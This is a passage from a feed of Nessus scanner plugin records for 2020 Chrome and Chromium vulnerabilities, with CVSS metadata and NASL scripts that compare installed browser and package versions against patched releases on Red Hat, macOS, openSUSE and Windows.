chromium-browser: Inappropriate implementation in Blink (CVE-2020-16000)\n\n - chromium-browser: Use after free in media (CVE-2020-16001)\n\n - chromium-browser: Use after free in PDFium (CVE-2020-16002)\n\n - chromium-browser: Use after free in printing (CVE-2020-16003)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/190.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15999\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-16000\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-16001\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-16002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-16003\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4351\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890266\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890267\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890268\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890269\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16003\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(122, 190);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'enterprise_linux_6_client': [\n 'rhel-6-desktop-debug-rpms',\n 'rhel-6-desktop-fastrack-debug-rpms',\n 'rhel-6-desktop-fastrack-rpms',\n 'rhel-6-desktop-fastrack-source-rpms',\n 'rhel-6-desktop-optional-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-rpms',\n 'rhel-6-desktop-optional-fastrack-source-rpms',\n 'rhel-6-desktop-optional-rpms',\n 'rhel-6-desktop-optional-source-rpms',\n 'rhel-6-desktop-rpms',\n 'rhel-6-desktop-source-rpms'\n ],\n 'enterprise_linux_6_computenode': [\n 'rhel-6-for-hpc-node-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-fastrack-rpms',\n 'rhel-6-for-hpc-node-fastrack-source-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-source-rpms',\n 'rhel-6-hpc-node-debug-rpms',\n 'rhel-6-hpc-node-optional-debug-rpms',\n 'rhel-6-hpc-node-optional-rpms',\n 'rhel-6-hpc-node-optional-source-rpms',\n 'rhel-6-hpc-node-rpms',\n 'rhel-6-hpc-node-source-rpms',\n 'rhel-hpc-node-6-eus-sfs-debug-rpms',\n 'rhel-hpc-node-6-eus-sfs-source-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-debug-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-source-rpms'\n ],\n 'enterprise_linux_6_server': [\n 'rhel-6-server-debug-rpms',\n 'rhel-6-server-fastrack-debug-rpms',\n 'rhel-6-server-fastrack-rpms',\n 'rhel-6-server-fastrack-source-rpms',\n 'rhel-6-server-optional-debug-rpms',\n 'rhel-6-server-optional-fastrack-debug-rpms',\n 'rhel-6-server-optional-fastrack-rpms',\n 'rhel-6-server-optional-fastrack-source-rpms',\n 'rhel-6-server-optional-rpms',\n 'rhel-6-server-optional-source-rpms',\n 'rhel-6-server-rpms',\n 'rhel-6-server-source-rpms',\n 'rhel-ha-for-rhel-6-server-debug-rpms',\n 'rhel-ha-for-rhel-6-server-rpms',\n 'rhel-ha-for-rhel-6-server-source-rpms',\n 'rhel-lb-for-rhel-6-server-debug-rpms',\n 'rhel-lb-for-rhel-6-server-rpms',\n 'rhel-lb-for-rhel-6-server-source-rpms',\n 'rhel-rs-for-rhel-6-server-debug-rpms',\n 'rhel-rs-for-rhel-6-server-rpms',\n 'rhel-rs-for-rhel-6-server-source-rpms',\n 'rhel-scalefs-for-rhel-6-server-debug-rpms',\n 'rhel-scalefs-for-rhel-6-server-rpms',\n 'rhel-scalefs-for-rhel-6-server-source-rpms'\n ],\n 'enterprise_linux_6_workstation': [\n 'rhel-6-workstation-debug-rpms',\n 'rhel-6-workstation-fastrack-debug-rpms',\n 'rhel-6-workstation-fastrack-rpms',\n 'rhel-6-workstation-fastrack-source-rpms',\n 'rhel-6-workstation-optional-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-rpms',\n 'rhel-6-workstation-optional-fastrack-source-rpms',\n 'rhel-6-workstation-optional-rpms',\n 'rhel-6-workstation-optional-source-rpms',\n 'rhel-6-workstation-rpms',\n 'rhel-6-workstation-source-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-debug-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-source-rpms'\n ],\n 'rhel_extras_6': [\n 'rhel-6-desktop-supplementary-debuginfo',\n 'rhel-6-desktop-supplementary-rpms',\n 'rhel-6-desktop-supplementary-source-rpms',\n 'rhel-6-for-hpc-node-supplementary-debuginfo',\n 'rhel-6-for-hpc-node-supplementary-rpms',\n 'rhel-6-for-hpc-node-supplementary-source-rpms',\n 'rhel-6-server-aus-supplementary-debuginfo',\n 'rhel-6-server-aus-supplementary-rpms',\n 'rhel-6-server-aus-supplementary-source-rpms',\n 'rhel-6-server-eus-supplementary-debuginfo',\n 'rhel-6-server-eus-supplementary-rpms',\n 'rhel-6-server-eus-supplementary-source-rpms',\n 'rhel-6-server-supplementary-debuginfo',\n 'rhel-6-server-supplementary-rpms',\n 'rhel-6-server-supplementary-source-rpms',\n 'rhel-6-workstation-supplementary-debuginfo',\n 'rhel-6-workstation-supplementary-rpms',\n 'rhel-6-workstation-supplementary-source-rpms',\n 'rhel-hpc-node-6-eus-supplementary-debug-rpms',\n 'rhel-hpc-node-6-eus-supplementary-rpms',\n 'rhel-hpc-node-6-eus-supplementary-source-rpms'\n ],\n 'rhel_extras_hpn_6': [\n 'rhel-hpn-for-rhel-6-hpc-node-rpms',\n 'rhel-hpn-for-rhel-6-server-rpms'\n ],\n 'rhel_extras_oracle_java_6': [\n 'rhel-6-desktop-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-for-hpc-node-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-server-aus-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-server-eus-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-server-restricted-maintenance-oracle-java-rpms',\n 'rhel-6-workstation-restricted-maintenance-oracle-java-rpms',\n 'rhel-hpc-node-6-eus-restricted-maintenance-oracle-java-rpms'\n ],\n 'rhel_extras_sap_6': [\n 'rhel-sap-for-rhel-6-server-debug-rpms',\n 'rhel-sap-for-rhel-6-server-eus-debug-rpms',\n 'rhel-sap-for-rhel-6-server-eus-rpms',\n 'rhel-sap-for-rhel-6-server-eus-source-rpms',\n 'rhel-sap-for-rhel-6-server-rpms',\n 'rhel-sap-for-rhel-6-server-source-rpms'\n ],\n 'rhel_extras_sap_hana_6': [\n 'rhel-sap-hana-for-rhel-6-server-debug-rpms',\n 'rhel-sap-hana-for-rhel-6-server-eus-debug-rpms',\n 'rhel-sap-hana-for-rhel-6-server-eus-rpms',\n 'rhel-sap-hana-for-rhel-6-server-rpms',\n 'rhel-sap-hana-for-rhel-6-server-source-rpms'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nvar enterprise_linux_flag = rhel_repo_sets_has_enterprise_linux(repo_sets:repo_sets);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'chromium-browser-86.0.4240.111-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation', 'rhel_extras_6', 'rhel_extras_hpn_6', 'rhel_extras_oracle_java_6', 'rhel_extras_sap_6', 'rhel_extras_sap_hana_6']},\n {'reference':'chromium-browser-86.0.4240.111-1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation', 'rhel_extras_6', 'rhel_extras_hpn_6', 'rhel_extras_oracle_java_6', 'rhel_extras_sap_6', 'rhel_extras_sap_hana_6']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp']) && !enterprise_linux_flag) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium-browser');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-21T14:38:21", "description": "The version of Google Chrome installed on the remote macOS host is prior to 86.0.4240.111. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_10_stable-channel-update-for-desktop_20 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Google Chrome < 86.0.4240.111 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_86_0_4240_111.NASL", "href": "https://www.tenable.com/plugins/nessus/141574", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141574);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16000\",\n \"CVE-2020-16001\",\n \"CVE-2020-16002\",\n \"CVE-2020-16003\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Google Chrome < 86.0.4240.111 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 86.0.4240.111. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2020_10_stable-channel-update-for-desktop_20 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?908ce031\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1125337\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1135018\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1137630\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1139963\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1134960\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 86.0.4240.111 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16003\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'86.0.4240.111', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-21T14:38:21", "description": "This update for chromium fixes the following issues :\n\n - Update to 86.0.4240.111 boo#1177936\n\n - CVE-2020-16000: Inappropriate implementation in Blink.\n\n - CVE-2020-16001: Use after free in media.\n\n - CVE-2020-16002: Use after free in PDFium.\n\n - CVE-2020-15999: Heap buffer overflow in Freetype.\n\n - CVE-2020-16003: Use after free in printing.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2020-1718)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-1718.NASL", "href": "https://www.tenable.com/plugins/nessus/141888", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1718.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141888);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16000\",\n \"CVE-2020-16001\",\n \"CVE-2020-16002\",\n \"CVE-2020-16003\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-1718)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\n - Update to 86.0.4240.111 boo#1177936\n\n - CVE-2020-16000: Inappropriate implementation in Blink.\n\n - CVE-2020-16001: Use after free in media.\n\n - CVE-2020-16002: Use after free in PDFium.\n\n - CVE-2020-15999: Heap buffer overflow in Freetype.\n\n - CVE-2020-16003: Use after free in printing.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1177936\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-86.0.4240.111-lp151.2.147.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-86.0.4240.111-lp151.2.147.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-86.0.4240.111-lp151.2.147.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-86.0.4240.111-lp151.2.147.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-24T15:03:30", "description": "The version of Google Chrome installed on the remote Windows host is prior to 86.0.4240.183. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_11_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2020-11-02T00:00:00", "type": "nessus", "title": "Google Chrome < 86.0.4240.183 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16011"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_86_0_4240_183.NASL", "href": "https://www.tenable.com/plugins/nessus/142209", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142209);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-16004\",\n \"CVE-2020-16005\",\n \"CVE-2020-16006\",\n \"CVE-2020-16007\",\n \"CVE-2020-16008\",\n \"CVE-2020-16009\",\n \"CVE-2020-16011\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Google Chrome < 86.0.4240.183 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 86.0.4240.183. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2020_11_stable-channel-update-for-desktop advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74346d34\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1138911\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1139398\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1133527\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1125018\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1134107\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1143772\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1144489\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 86.0.4240.183 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16011\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'86.0.4240.183', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": 